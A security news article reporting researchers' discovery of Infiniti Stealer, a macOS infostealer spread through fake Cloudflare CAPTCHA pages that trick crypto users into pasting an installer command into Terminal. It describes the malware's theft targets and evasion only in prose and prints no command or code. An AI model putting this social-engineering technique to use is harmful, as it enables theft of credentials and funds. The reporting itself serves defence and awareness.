A new infostealer called Infiniti Stealer targets Mac users through fake CAPTCHA pages that trick victims into running dangerous commands in the Terminal.
Security researchers at Malwarebytes have identified a new malicious campaign targeting crypto users on macOS. The attack exploits fake CAPTCHA pages that mimic the Cloudflare verification system to trick victims into installing an infostealer called Infiniti Stealer, designed to steal crypto wallet data, credentials, and other sensitive information from Apple computers.
The attack falls under the ClickFix category – a social engineering technique in which the user is manipulated into executing the malicious command themselves. The process begins with a fake page hosted on update-check[.]com, which faithfully replicates the appearance of a Cloudflare verification screen. After clicking the fake CAPTCHA, the user is instructed to open the Terminal and paste a command. That command is not a verification step: it is a hidden installation script that downloads and executes the malware on the computer.
Once the command is run, the system connects to a remote server controlled by the attacker, from which Infiniti Stealer is silently downloaded and installed – with no pop-ups or warnings. Researchers point out that the malware is compiled as a native macOS binary, making it significantly harder to analyze and detect compared to a simple Python script. The malicious software is designed to steal crypto wallet data, credentials from browsers and the macOS Keychain, plaintext secrets from developer files, and screenshots captured during execution. It also checks whether it is running in an analysis environment to evade detection, sends the stolen data to the attacker’s server, and notifies the attacker via Telegram upon completion of the extraction.
The data confirms a worrying trend in personal wallet security. According to a report by blockchain security firm Chainalysis, $3.4 billion was stolen from the cryptocurrency industry in 2025. The most significant figure relates to the growth of attacks targeting personal wallets: their share of total stolen value rose from 7.3% in 2022 to 44% in 2024. Without the anomalous impact of the Bybit attack, this percentage would have reached 37% in 2025 as well.
Crypto users are advised to never paste commands into the Terminal from untrusted sources and to exercise maximum caution while browsing.
